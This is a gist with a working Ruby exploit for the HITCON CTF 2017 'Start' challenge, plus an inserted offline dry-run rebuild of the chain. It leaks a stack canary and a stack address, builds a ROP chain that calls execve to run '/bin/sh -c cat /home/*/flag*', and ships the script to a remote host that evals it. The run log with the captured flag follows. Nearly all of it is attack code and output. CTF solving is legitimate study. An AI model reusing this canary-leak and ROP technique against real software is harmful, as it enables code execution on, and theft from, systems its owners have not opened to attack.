@Tosainu
Created November 7, 2017 08:18
# exploit.rb: runs on the challenge box (shipped there by exploit2.rb below)
# and attacks the `start` binary listening on 127.0.0.1:31338.
require 'pwn'
z = Sock.new '127.0.0.1', 31338

# Leak the stack canary. Its low byte is always 0x00, so a 0x19-byte write
# clobbers just that byte and the echo runs on into the canary; mask the
# clobbered byte back to zero afterwards.
z.send 'A' * 0x19
z.recv 0x18
canary = u64(z.recv 8) & (~0xff)
log.info "canary: #{canary.hex}"
z.recv

# Leak a stack address: fill 0x40 bytes and read the 6 significant bytes of
# the pointer that follows, zero-padding it to 8 bytes for u64.
z.send 'A' * 0x40
z.recv 0x40
stack = u64((z.recv 6) + "\x00\x00") & 0x00ffffffffffff
log.info "stack: #{stack.hex}"
z.recv

# Gadgets in the static binary: enough for execve(path, argv, envp).
pop_rax_rdx_rbx_ret = 0x0047a6e6
pop_rdi_ret = 0x004005d5
pop_rsi_ret = 0x004017f7
syscall = 0x004003fc

# ROP chain. The strings and the argv array live inside this payload; the
# overflowed buffer starts at stack - 0x158, so stack - 0x100 + X points at
# payload offset X + 0x58.
payload = ''
payload += 'A' * 0x18
payload += p64 canary                   # keep the canary intact
payload += 'A' * 8                      # saved rbp
payload += p64 pop_rax_rdx_rbx_ret
payload += p64 59                       # rax = SYS_execve
payload += p64 0                        # rdx = envp = NULL
payload += p64 0                        # rbx (unused)
payload += p64 pop_rdi_ret
payload += p64 (stack - 0x100 + 0x38)   # rdi = "/bin/sh"   (payload offset 0x90)
payload += p64 pop_rsi_ret
payload += p64 (stack - 0x100 + 0x18)   # rsi = argv       (payload offset 0x70)
payload += p64 syscall
payload += p64 (stack - 0x100 + 0x38)   # argv[0] = "/bin/sh"
payload += p64 (stack - 0x100 + 0x40)   # argv[1] = "-c"
payload += p64 (stack - 0x100 + 0x48)   # argv[2] = command
payload += p64 0                        # argv[3] = NULL
payload += '/bin/sh'.ljust(8, "\x00")
payload += '-c'.ljust(8, "\x00")
payload += 'cat /home/*/flag*'
z.write payload
z.recv
z.sendline 'exit'                       # leave the input loop so the function returns into the chain
loop{puts z.recv}                       # relay the flag until the connection closes
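Added example, not part of the original gist: the execve chain above, rebuilt without the pwn gem and dry-run offline to check that every pointer in the payload (rdi, rsi and each argv entry) resolves to the intended string inside the payload itself. p64/u64 are reimplemented with pack/unpack, the gadget addresses are the gist's, and the 0x158 buffer-to-leak distance is derived from the gist's own offsets (argv sits at payload offset 0x70 and is addressed as stack - 0x100 + 0x18). The canary and stack values used as input are the ones logged in the run at the bottom of the page.

```ruby
# Added example, not from the gist: rebuild the execve ROP chain without the
# pwn gem and dry-run it to confirm the payload's pointer arithmetic.

# pwntools' p64/u64, reimplemented with pack/unpack (little-endian u64).
def p64(v)
  [v & 0xffffffffffffffff].pack('Q<')
end

def u64(s)
  s.unpack('Q<').first
end

# Gadget addresses from the gist (static x86_64 `start` binary).
GADGETS = {
  pop_rax_rdx_rbx_ret: 0x0047a6e6,
  pop_rdi_ret:         0x004005d5,
  pop_rsi_ret:         0x004017f7,
  syscall:             0x004003fc
}.freeze

SYS_EXECVE = 59

# The gist addresses strings and argv as (stack - 0x100 + off). argv lives at
# payload offset 0x70 and is addressed with off = 0x18, so the overflowed
# buffer starts 0x158 bytes below the leaked stack value.
BUF_BELOW_LEAK = 0x158

def build_payload(canary, stack, cmd = 'cat /home/*/flag*')
  # glibc keeps the low canary byte at zero; a leak must restore it.
  raise ArgumentError, 'canary low byte must be 0' unless (canary & 0xff).zero?
  base = stack - 0x100
  payload = 'A' * 0x18                 # fill up to the canary
  payload += p64(canary)
  payload += 'A' * 8                   # saved rbp, don't care
  payload += p64(GADGETS[:pop_rax_rdx_rbx_ret])
  payload += p64(SYS_EXECVE)           # rax = execve
  payload += p64(0)                    # rdx = envp = NULL
  payload += p64(0)                    # rbx, unused
  payload += p64(GADGETS[:pop_rdi_ret])
  payload += p64(base + 0x38)          # rdi = "/bin/sh" (payload offset 0x90)
  payload += p64(GADGETS[:pop_rsi_ret])
  payload += p64(base + 0x18)          # rsi = argv      (payload offset 0x70)
  payload += p64(GADGETS[:syscall])
  payload += p64(base + 0x38)          # argv[0] = "/bin/sh"
  payload += p64(base + 0x40)          # argv[1] = "-c"
  payload += p64(base + 0x48)          # argv[2] = cmd
  payload += p64(0)                    # argv[3] = NULL
  payload += '/bin/sh'.ljust(8, "\x00")
  payload += '-c'.ljust(8, "\x00")
  payload + cmd
end

# Follow the chain the way the CPU would once the overwritten return address
# is popped, then dereference rdi/rsi into the payload itself.
def dry_run(payload, stack)
  buf = stack - BUF_BELOW_LEAK
  read_q = ->(off) { u64(payload.byteslice(off, 8)) }
  # Resolve a payload-internal pointer to a payload offset (nil if outside).
  to_off = ->(ptr) { o = ptr - buf; (o >= 0 && o < payload.bytesize) ? o : nil }
  cstr = lambda do |ptr|
    o = to_off.(ptr) or raise "pointer %#x is outside the payload" % ptr
    payload.byteslice(o, payload.bytesize - o).split("\x00", 2).first
  end

  regs = {}
  sp = 0x28   # return-address slot: 0x18 buffer + 8 canary + 8 saved rbp
  loop do
    gadget = read_q.(sp)
    sp += 8
    case gadget
    when GADGETS[:pop_rax_rdx_rbx_ret]
      regs[:rax], regs[:rdx], regs[:rbx] = 3.times.map { v = read_q.(sp); sp += 8; v }
    when GADGETS[:pop_rdi_ret]
      regs[:rdi] = read_q.(sp)
      sp += 8
    when GADGETS[:pop_rsi_ret]
      regs[:rsi] = read_q.(sp)
      sp += 8
    when GADGETS[:syscall]
      break
    else
      raise "unexpected return target %#x at payload offset %#x" % [gadget, sp - 8]
    end
  end

  argv = []
  off = to_off.(regs.fetch(:rsi)) or raise 'argv pointer is outside the payload'
  loop do
    ptr = read_q.(off)
    off += 8
    break if ptr.zero?
    argv << cstr.(ptr)
  end
  { nr: regs.fetch(:rax), path: cstr.(regs.fetch(:rdi)), argv: argv, envp: regs.fetch(:rdx) }
end

if __FILE__ == $0
  # Values logged by the run at the bottom of this page, reused as test input.
  canary = 0xd1b454730f989000
  stack  = 0x7ffed8f31988
  p dry_run(build_payload(canary, stack), stack)
end
```

Running it should report `{:nr=>59, :path=>"/bin/sh", :argv=>["/bin/sh", "-c", "cat /home/*/flag*"], :envp=>0}`; if the leaked stack value were off by a different amount from the buffer, the argv walk would land on garbage or raise, which is the failure mode to rule out before sending the chain.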
# HITCON CTF 2017 Quals: Start
# exploit2.rb: the remote service evals the Ruby it receives (pwntools-ruby is
# installed on the box), so ship exploit.rb to it and relay whatever comes back.
require 'pwn'
z = Sock.new '54.65.72.116', 31337
z.recvuntil '> '
z.write File.read('./exploit.rb')
loop {
  puts z.recv
}
# $ bundle exec ruby exploit2.rb
# [INFO] canary: 0xd1b454730f989000
# [INFO] stack: 0x7ffed8f31988
#
# Both EOFError backtraces are expected once the flag has been read: the first
# comes from the remote server.rb eval (pwntools 1.0.0 on the box) hitting EOF
# when the exploited process closes, the second from the local tube
# (pwntools 1.0.1) hitting EOF when the server closes the connection.
#
# hitcon{thanks_for_using_pwntools-ruby:D}
# server.rb:15:in `eval': EOFError (EOFError)
# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/sock.rb:84:in `recv_raw'
# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:246:in `block in fillbuffer'
# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/timer.rb:54:in `countdown'
# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:244:in `fillbuffer'
# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:38:in `recv'
# from (eval):42:in `block in <main>'
# from (eval):41:in `loop'
# from (eval):41:in `<main>'
# from server.rb:15:in `eval'
# from server.rb:15:in `<main>'
# /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/sock.rb:90:in `rescue in recv_raw': EOFError (EOFError)
# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/sock.rb:84:in `recv_raw'
# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:246:in `block in fillbuffer'
# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/timer.rb:54:in `countdown'
# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:244:in `fillbuffer'
# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:38:in `recv'
# from exploit2.rb:10:in `block in <main>'
# from exploit2.rb:9:in `loop'
# from exploit2.rb:9:in `<main>'